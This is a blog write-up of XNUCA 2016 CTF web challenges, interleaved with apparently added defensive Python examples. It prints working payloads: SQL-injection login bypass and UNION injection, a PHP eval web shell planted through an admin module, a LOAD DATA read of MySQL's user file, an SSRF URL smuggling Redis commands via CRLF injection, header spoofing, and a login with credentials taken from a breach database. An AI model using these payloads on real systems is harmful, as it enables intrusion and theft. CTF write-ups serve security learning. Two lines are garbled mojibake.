LoRexxar's Blog

XNUCA2016 Writeup

2016/08/01

Over the weekend I played XNUCA on my own for a stretch (my teammates wandered off somewhere partway through...). Being fairly weak, I only made it to somewhere in the twenties, so here is a quick tidy-up of the writeup.


Sign

Good Luck! flag{X-nuca@GoodLuck!}

Nothing to say here.

BaseCoding

Hint: this is an encoding, not encryption! Which encoding commonly contains equals signs?
This string of characters looks strange; could it be hiding some information? http://question1.erangelab.com/

杩欑棰樼洰杩橀渶瑕佹彁绀衡..base64瑙d竴涓嬪氨濂戒簡

BaseInjection

Hint: try the "universal password" (the classic SQL-injection login bypass).
You can log in even without knowing the password. http://question2.erangelab.com/

http://question2.erangelab.com/chklogin.php
username=admin'||1#&password=admin
flag{N1ce1njected}

4. BaseReconstruction

Hint: reconstructing request packets is a basic skill.
This challenge looks the same as the previous one, but it isn't. http://question3.erangelab.com/

Honestly I couldn't tell what the difference was; the payload is the same as above.

http://question3.erangelab.com/chklogin.php
username=admin'||1#&password=123
flag{Cr05sthEjava5cr1pt}
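The `admin'||1#` payload works because the login glues the submitted username straight into the SQL text: in MySQL `||` is OR and `#` starts a comment, so the WHERE clause collapses to `username='admin' OR 1`. The UNION/information_schema injection in the AdminLogin challenge further down has the same root cause. The following Python is an added example, not code from the challenges or from this post: `build_vulnerable_query` shows the statement a concatenating login would send for the page's payload, and `login_safe` is the parameterized, salted-hash alternative that treats the same payload as an ordinary (non-existent) username. The users table, account and password are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3


def build_vulnerable_query(username: str, password: str) -> str:
    """Statement text a string-concatenating login would send (illustration
    only, never executed here). With username "admin'||1#" MySQL reads the
    WHERE clause as  username='admin' OR 1  and discards the rest after '#'."""
    return ("SELECT * FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256 with a per-user salt; the iteration count is a demo value.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account: admin / correct-horse."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
                 " salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
                 ("admin", salt, hash_password("correct-horse", salt)))
    conn.commit()
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized lookup: the driver sends the username as data, so quotes,
    '||' and '#' inside it can never change the statement's structure."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # constant-time comparison of the derived hash against the stored one
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    conn = setup_db()
    print(build_vulnerable_query("admin'||1#", "admin"))
    print("payload login:", login_safe(conn, "admin'||1#", "admin"))
    print("real login:   ", login_safe(conn, "admin", "correct-horse"))
```

The safe version runs against SQLite here, but the placeholder mechanism is the same in every mainstream driver; what matters is that the username never becomes part of the statement text.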

5. CountingStars

Hint: a careless Mac leaks as well.
No more $s counting stars. http://question4.erangelab.com/

The note inside was enough to guess this was a Mac backup.

On a Mac every folder contains a .DS_Store file, which holds some information about that folder's contents.

http://question4.erangelab.com/.DS_Store

Opening it in a hex editor reveals epLF1rEihQp5AjCUcgGry330jkFSC1C7.zip.

The download turned out to be a corrupted zip; dragging it over to Linux and running binwalk on it yields index.php.

<?php
// Each variable's value is the name of the next one, forming an 8-step cycle:
// S -> song -> says -> no -> more -> d0llars -> counting -> star -> S
$S="song";
$song="says";
$says="no";
$no="more";
$more="d0llars";
$d0llars="counting";
$counting="star";
$star="S";
echo '<div style="text-align:center">What is $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S</div>';
?>
<br>
<br>
<br>
<div style="text-align:center">
<form action="check.php" method="post">
<input type="text" name="answer" value="" />
<input type="submit" value="submit" />
</form>
</div>

Nothing much to say; just run it locally and print the result, which gives d0llars.
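The index.php above is a chain of PHP variable variables: `$S` is `song`, `$$S` is `$song`, which is `says`, and each extra `$` takes one more step around an eight-element cycle, so the answer depends only on the number of `$` characters modulo 8. The following Python is an added example, not part of the post or the challenge: it parses the assignments out of a PHP snippet, picks the `$...$name` expression out of the echo, and follows the chain, collapsing full cycles so runs of any length resolve quickly. It runs on a constructed shortened copy of the snippet with a 13-dollar run, not on the page's exact string.

```python
import re

# Constructed copy of the challenge's index.php: same assignments, but the
# echoed expression uses a 13-dollar run (13 mod 8 == 5 -> "d0llars").
PHP_SNIPPET = (
    '<?php\n'
    '$S="song"; $song="says"; $says="no"; $no="more";\n'
    '$more="d0llars"; $d0llars="counting"; $counting="star"; $star="S";\n'
    "echo '<div>What is " + "$" * 13 + "S</div>';\n"
    '?>\n'
)


def parse_assignments(src: str) -> dict:
    """Collect every  $name="value";  assignment into a name -> value map."""
    return dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"\s*;', src))


def resolve_variable_variable(assignments: dict, expr: str) -> str:
    """Evaluate a $$...$name expression the way PHP would: one lookup per '$'.
    Reaching a name a second time means the chain is cyclic; the remaining
    steps are then reduced modulo the cycle length."""
    m = re.fullmatch(r"(\$+)(\w+)", expr)
    if not m:
        raise ValueError(f"not a variable-variable expression: {expr!r}")
    depth, cur = len(m.group(1)), m.group(2)
    first_seen = {}  # name -> step at which it was first reached
    step = 0
    while step < depth:
        if cur in first_seen:
            cycle = step - first_seen[cur]
            depth = step + (depth - step) % cycle  # drop whole cycles
            first_seen = {}
            continue
        first_seen[cur] = step
        if cur not in assignments:
            raise KeyError(f"undefined variable ${cur} at step {step}")
        cur = assignments[cur]
        step += 1
    return cur


def solve_snippet(src: str) -> str:
    """Find the echoed $...$name expression in the snippet and resolve it."""
    m = re.search(r"echo\s+'[^']*?(\$+\w+)", src)
    if not m:
        raise ValueError("no echoed variable-variable expression found")
    return resolve_variable_variable(parse_assignments(src), m.group(1))


if __name__ == "__main__":
    print(solve_snippet(PHP_SNIPPET))
```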

check.php redirects immediately, so use curl instead:

ubuntu@VM-181-46-ubuntu:~$ curl 'http://question4.erangelab.com/check.php' -H 'Host: question4.erangelab.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'Content-Type: application/x-www-form-urlencoded' --data 'answer=d0llars'
flag{whyD0lIarsA9ain!}

6. Invisible

Hide your IP to protect yourself. http://121.195.186.234

On opening it I had no idea what to do; I guessed it wanted X-Forwarded-For changed, and any change at all passed it...

7. Normal_normal

Hint: phpwind admin panel getxxxxx
Another bbs. http://question6.erangelab.com/

Reading the posts turned up the email address zhangrendao2008#126.com.

A teammate found a breach-data (social-engineering database) lookup and got:

account: zhangrendao, password: zhang2010

Enter the admin panel at http://question6.erangelab.com/admin.php

While editing modules, I found a custom HTML module that lets you write code directly, so we construct:

<?php echo 'test';eval($_POST['a']) ?>

Digging around, I found the external-call interface, which is implemented via PHP file inclusion, so the idea works:

http://question6.erangelab.com/index.php?m=design&c=api&token=MOw0mvL9kj&id=44&format=script

get shell

a=$username=file_get_contents('./flag-3g5WFxt7Fxp09C.txt');var_dump($username);
&csrf_token=e24bceb1c744db43
flag{n0rmal_meth0d_n0rmal_l1fe}

8. DBexplorer

Hint: a. SELECT @@datadir ... mysql/user.MYD b. user.MYD
Where is my data. http://question7.erangelab.com/ (please do not change the password!)

Inside I found .db.php.swp, which gave the current account's username and password, and then found phpmyadmin.

username:ctfdb password:ctfmysql123
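The .DS_Store in CountingStars and the .db.php.swp here are the same class of leak: operating-system and editor metadata left inside the web root, where the web server happily serves it. The following Python is an added example, not from the post or the challenges: it walks a directory tree and reports files and directories whose names mark them as metadata or backup artifacts, and builds a constructed sample web root (with names modelled on those two challenges) to run itself on. The pattern list is my own selection and the file contents are placeholders.

```python
import os
import re
import tempfile

# (pattern matched against a bare file name, reason to report it)
SENSITIVE_FILES = [
    (re.compile(r"^\.DS_Store$"), "macOS Finder metadata: lists directory entries"),
    (re.compile(r"^\..+\.sw[a-p]$"), "vim swap file: may hold unsaved source and credentials"),
    (re.compile(r".+\.(bak|orig|old|save)$"), "backup copy, usually served as plain text"),
    (re.compile(r".+~$"), "editor backup copy"),
]
SENSITIVE_DIRS = {
    ".git": "version-control metadata: allows source reconstruction",
    ".svn": "version-control metadata: allows source reconstruction",
}


def scan_webroot(root: str) -> list:
    """Return sorted (relative path, reason) pairs for every artifact under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        prefix = "" if rel_dir == "." else rel_dir + "/"
        for d in list(dirnames):
            if d in SENSITIVE_DIRS:
                findings.append((prefix + d, SENSITIVE_DIRS[d]))
                dirnames.remove(d)  # report the directory once, do not descend
        for f in filenames:
            for pattern, reason in SENSITIVE_FILES:
                if pattern.match(f):
                    findings.append((prefix + f, reason))
                    break
    return sorted(findings)


def build_sample_webroot() -> str:
    """Constructed web root modelled on the two challenges; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {  # placeholder contents, not real files from the challenges
        "index.php": "<?php echo 'hello'; ?>",
        "db.php": "<?php $pass = 'db-password-here'; ?>",
        ".db.php.swp": "b0VIM swap contents (constructed)",
        ".DS_Store": "Bud1 (constructed placeholder)",
        "uploads/.DS_Store": "Bud1 (constructed placeholder)",
        ".git/HEAD": "ref: refs/heads/master",
    }
    for name, content in layout.items():
        path = os.path.join(root, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in scan_webroot(build_sample_webroot()):
        print(f"{path}: {reason}")
```

Running this against the document root before deployment (or from a CI job) catches exactly the two artifacts that handed over a filename in CountingStars and database credentials here; a deny rule for dotfiles in the web server configuration is the complementary runtime control.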

Via SELECT @@datadir we get the MySQL data directory, /var/lib/mysql/

Combined with some searching online, the file path is /var/lib/mysql/mysql/user.MYD

Inside I found that the table q could be used to read file contents; load_file could not read the data (never figured out why).

Later I found the LOAD DATA command, and hit another pitfall here over whether to use LOCAL:

http://blog.csdn.net/youngerchen/article/details/7881678

Final payload:

LOAD DATA INFILE '/var/lib/mysql/mysql/user.MYD' INTO TABLE q fields terminated by 'LINES' TERMINATED BY '\0'

There is another account; logging in with it gives the flag.

9. RotatePicture

Hint: urlopen file schema
Rotate, rotate, rotate. http://question8.erangelab.com/picrotate

The challenge takes an uploaded image and returns it upside down.

A bit of testing shows this endpoint can scan the internal network and supports pseudo-protocols, which means we can craft an SSRF to attack with...

Through the file protocol we can read files, but only one line...

file:///etc/passwd

Looking at the source, there is a hint pointing at views.py:

file:///views.py

We get:

http://question8.erangelab.com/getredisvalue

The internal network has redis open on port 6379, so we can attack it through the Python urllib HTTP header injection vulnerability.

There are two articles on this:
https://virusdefender.net/index.php/archives/749
https://security.tencent.com/index.php/blog/msg/106

But I couldn't work out how to write it; all sorts of errors, plus a length check. So I forced a SET and looked at the value:

http://127.0.0.1%0d%0aset%20c46fb8d3-6322-42ba-8919-dc4b914714db%2012345%0d%0a:6379

涓棿灏辨槸getredisvalue鎷垮埌鐨uuid锛屾煡璇㈠埛鏂板氨鎷垮埌flag浜嗐

1
flag{url0pen_1s_1nterest1ng}
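The picrotate endpoint fell because it handed a user-supplied URL to urlopen unchecked: the `file://` scheme read local files, and `%0d%0a` in the host part (decoded by the vulnerable urllib) let a request smuggle Redis commands to 127.0.0.1:6379. The following Python is an added example, not from the post or the challenge: `validate_fetch_url` is the pre-flight check a fetch-by-URL feature should run before any request is made, rejecting non-HTTP schemes, control characters in raw or percent-decoded form, and hosts that name loopback, private, link-local or otherwise internal addresses. The sample URLs are constructed and include the shape of the page's two payloads.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
LOCAL_NAMES = {"localhost"}  # plus anything under .localhost


def host_is_internal(host: str) -> bool:
    """True for loopback, private, link-local, multicast, reserved or
    unspecified IP literals and for the localhost name. Hostnames are not
    resolved here (see the note below the block)."""
    lowered = host.lower().strip("[]")
    if lowered in LOCAL_NAMES or lowered.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(lowered)
    except ValueError:
        return False  # a DNS name: must be resolved and re-checked before use
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url: str):
    """Return (ok, reason). Run before urlopen/requests ever sees the URL."""
    # Header injection: CR/LF may arrive raw or percent-encoded, and the
    # vulnerable urllib decoded the host part, so check both forms.
    if CONTROL_CHARS.search(url) or CONTROL_CHARS.search(unquote(url)):
        return False, "control characters in URL (header injection)"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '(none)'} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host_is_internal(host):
        return False, f"host {host} is an internal address"
    return True, "ok"


SAMPLE_URLS = [  # constructed inputs, shaped like the page's payloads
    "https://example.com/cat.png",
    "file:///etc/passwd",
    "http://127.0.0.1%0d%0aset%20key%20value%0d%0a:6379",
    "http://127.0.0.1:6379/",
    "http://10.0.0.5/admin",
    "http://[::1]/",
    "http://localhost/",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        ok, reason = validate_fetch_url(u)
        print(("ALLOW " if ok else "BLOCK ") + u + "  (" + reason + ")")
```

For a real deployment the literal check is only the first half: resolve the hostname with `socket.getaddrinfo`, run `host_is_internal` over every returned address, connect to that checked address rather than re-resolving (DNS rebinding), and either disable redirects or validate each hop, since a public host can redirect the fetcher straight back to 127.0.0.1.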

10. AdminLogin

On the way in. http://121.195.186.238/index.php

First, injection. Not sure whether the challenge author set a trap here, but it works as long as the Referer is included:

http://question9.erangelab.com/news.php?newsid=2 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 1,1%23
Referer:
http://question9.erangelab.com/index.php

Injection yields the admin's credentials:

ctfphp
>admin ; news
>id,name,pass ; id,title,content
ctfadmin

admin
administrat0r

Then found robots.txt:

robots.txt
# robots.txt generated at http://tool.chinaz.com/robots/
User-agent: *
Disallow:
Disallow: /xnucactfwebadmin/
Disallow: /dbconfig/
Sitemap: http://domain.com/sitemap.xml

A huge pitfall was buried here: the admin panel returned nothing at all, and the challenge was later changed without any announcement.

http://121.195.186.238/xnucactfwebadmin/logincheck.php
Submit username&password&submit, then set X-Forwarded-For to 8.8.8.8 and it works.
flag{U2NCF8yaniq5WirEE2wumYIfbrxcEiU2}
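Invisible (section 6) and the final step of AdminLogin fell to the same mistake: the application used the X-Forwarded-For header, which any client can set to whatever it likes, as the source address for an access decision. The following Python is an added example, not from the post or the challenges: `client_ip` derives the client address the way a server behind known reverse proxies should, taking the TCP peer address as authoritative, consulting the header only when the peer is one of its own proxies, and walking the header from the right so that values an attacker prepended are ignored. The proxy ranges and addresses used in the checks are constructed.

```python
import ipaddress


def _parse_ip(text: str):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def client_ip(remote_addr: str, xff_header, trusted_proxies) -> str:
    """Return the address to use for IP-based decisions.

    remote_addr      peer address of the TCP connection (cannot be forged)
    xff_header       raw X-Forwarded-For value, or None
    trusted_proxies  CIDR strings for reverse proxies you operate
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_proxies]

    def is_trusted(ip) -> bool:
        return ip is not None and any(ip in net for net in trusted)

    peer = _parse_ip(remote_addr)
    # Direct connection: whatever is in the header was written by the client.
    if not is_trusted(peer):
        return remote_addr
    hops = [h for h in (xff_header or "").split(",") if h.strip()]
    # Each proxy appends the address it saw, so walk right-to-left past our
    # own proxies and stop at the first address that is not one of them.
    for hop in reversed(hops):
        ip = _parse_ip(hop)
        if ip is None:
            return remote_addr  # malformed header: fail closed to the peer
        if not is_trusted(ip):
            return str(ip)
    return remote_addr  # every hop was ours


def ip_allowed(ip: str, allowlist) -> bool:
    """Access-control decision taken on the address from client_ip()."""
    addr = _parse_ip(ip)
    return addr is not None and any(addr in ipaddress.ip_network(n) for n in allowlist)


if __name__ == "__main__":
    proxies = ["10.0.0.0/8"]
    # Direct connection carrying a forged header: the header is ignored.
    print(client_ip("203.0.113.9", "8.8.8.8", proxies))
    # Behind our proxy: the genuine client address is recovered.
    print(client_ip("10.0.0.2", "198.51.100.7, 10.0.0.3", proxies))
    # Forged value the client prepended before the request hit our proxy.
    print(client_ip("10.0.0.2", "8.8.8.8, 198.51.100.7", proxies))
```

The trusted-proxy list must be the real addresses of your own edge, not "anything private"; if the list is wrong in either direction the header is either trusted from strangers (the bug in these two challenges) or ignored for legitimate traffic.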

OneWayIn

How can I get in. http://question11.erangelab.com/

http://question11.erangelab.com/index.php

Doing this one I felt like an idiot... I got in without finding the source, yet accidentally passed the check...

0_username[]=admin
&0_pwd[]=admin…
&submit=Submit

It returned a big pile of hex... which made me miss that a redirect had already happened... couldn't it just return something sensible???

http://question11.erangelab.com/flag_manager/index.php?file=dGVzdC50eHQ=&num=

We can base64-encode the filename and then read the contents line by line via num; a quick Python script does it.

<?php
error_reporting(0);
// the file name arrives base64-encoded in ?file=
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
// ?num= selects which line of the file to print
$line=isset($_GET['num'])?intval($_GET['num']):0;
if($file=='') header("location:index.php?file=dGVzdC50eHQ=&num=");
$file_list = array(
'0' =>'test.txt',
'1' =>'index.php',
);
// flag.php only joins the list when the (client-controlled) role cookie says flagadmin
if(isset($_COOKIE['role_cookie']) && $_COOKIE['role_cookie']=='flagadmin'){
$file_list[2]='flag.php';
}
// allowlist check, then print a single line of the chosen file
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

Because the challenge author's imagination ran wild and difficulty was forced in, flag.php is obfuscated with phpjiami, but the file read doesn't set an encoding, so the files read back were all incomplete; curl was incomplete too, and only Python read it back intact...

Paid 2.5 yuan on Taobao to have it decrypted, and done.
